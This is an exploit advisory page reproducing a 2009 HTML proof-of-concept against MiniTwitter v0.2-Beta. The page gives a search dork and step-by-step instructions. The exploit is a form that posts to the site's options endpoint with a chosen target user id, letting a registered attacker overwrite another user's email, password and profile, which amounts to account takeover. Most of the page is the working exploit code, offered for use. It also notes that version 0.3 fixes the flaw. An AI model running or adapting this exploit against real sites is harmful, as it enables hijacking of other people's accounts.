MiniTwitter v0.2-Beta+ User Options changer exploit

2009-05-02 / 2009-05-03
Credit: YEnH4ckEr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- ----------------------------------------------------------------- USER OPTIONS CHANGER EXPLOIT --MiniTwitter v0.2-Beta+-> ----------------------------------------------------------------- CMS INFORMATION: +->WEB: http://mt.bioscriptsdb.com/ +->DOWNLOAD: http://sourceforge.net/projects/minitt/ +->DEMO: http://www.bioscripts.net/minitwitter/index.php +->CATEGORY: Social Networking +->DESCRIPTION: Your business needs a private twitter. You can add... several twitters account and use this twitter as a buckup of all... +->RELEASED: 2009-04-30 CMS VULNERABILITY: +->TESTED ON: firefox 3 +->DORK: "BioScripts" +->CATEGORY: OPTIONS CHANGER +->AFFECT VERSION: <= 0.2 Beta +->Discovered Bug date: 2009-04-30 +->Reported Bug date: 2009-04-30 +->Fixed bug date: 2009-05-01 +->Info patch (0.3 Beta): http://sourceforge.net/projects/minitt/ +->Author: YEnH4ckEr +->mail: y3nh4ck3r[at]gmail[dot]com +->WEB/BLOG: N/A +->COMMENT: A mi novia Marijose...hermano,cu&#241;ada, padres (y amigos xD) por su apoyo. +->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) --> <html> <title> MiniTwitter <= v-0.2-Beta--by-y3nh4ck3r--> </title> <body bgcolor=#000000 text=#ffffff> <font color=#ff0000> <h1> MiniTwitter <= v-0.2-Beta--> USER OPTIONS CHANGER EXPLOIT </h1> </font> <font color=#ffff00> <H2> Instructions:<br> 1.- Register in the site.<br> 2.- Choose your configuration and id target. Use to search --> for example: http://[HOST]/[PATH]/index.php?user=1<br> 3.- [HOST]/[PATH] must be configured.<br> </H2> </font> <h4><font color=#ff0000> Notes:<br> [#--->] You cann't change the nick, but search it! <br> [#--->] If password is empty then change everything less password <br> </h4></font> <form action="path" method="post" name="register"> <h2>Configure -->[HOST]/[PATH]:</h2><input name="path" value="http://[HOST]/[PATH]/index.php?go=opt" size="120" type="text"><br> <h2>Target -->id:</h2><input name="id_usr" value="1" size="15" type="text"><br> <h2>Here new options:</h2> <table border="0"> <tr><td>First Name:</td><td><input name="nombre" value="First name" size="50" type="text"><br></td></tr> <tr><td>Second Name:</td><td><input name="apellidos" value="Second name" size="50" type="text"><br></td></tr> <tr><td>Date:</td><td><input name="fechaanio" value="2009" size="4" type="text">-<input name="fechames" value="05" size="2" type="text">-<input name="fechadia" value="1" size="2" type="text"></td></tr> <tr><td>Option bio:</td><td><input name="bio" value="bio" size="50" type="text"><br></td></tr> <tr><td>Country:</td><td><input name="country" value="Spain" size="50" type="text"><br></td></tr> <tr><td>State:</td><td><input name="state" value="Jaen" size="50" type="text"><br></td></tr> <tr><td>Sex:</td><td><input name="sex" value="Man" size="15" type="text"><br></td></tr> <tr><td>Option showing:</td><td><input name="showing" value="showing" size="15" type="text"><br></td></tr> <tr><td>E-mail:</td><td><input name="correo" value="y3nh4ck3r_at_gmail&#46;com" size="100" type="text"><br></td></tr> <tr><td>Password:</td><td><input name="pass1" value="y3nh4ck3r" size="100" type="text"><br></td></tr> <tr><td>Re-Password:</td><td><input name="pass2" value="y3nh4ck3r" size="100" type="text"><br></td></tr> <input name="gravatar" value="111" size="3" type="hidden"> <input name="timeline" value="111" size="3" type="hidden"> </table> <br><input name="submit" value="Change options" onclick="this.form.action=this.form.elements[0].value" type="submit"> </form> </body> <BR><BR> <font color=#ff0000> <h4> Exploit by y3nh4ck3r. Contact: y3nh4ck3r_at_gmail&#46;com </h4> </font> </html> <!-- <<+-----------------------------EOF----------------------------------+>>ENJOY IT!

References:

http://seclists.org/bugtraq/2009/May/0010.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top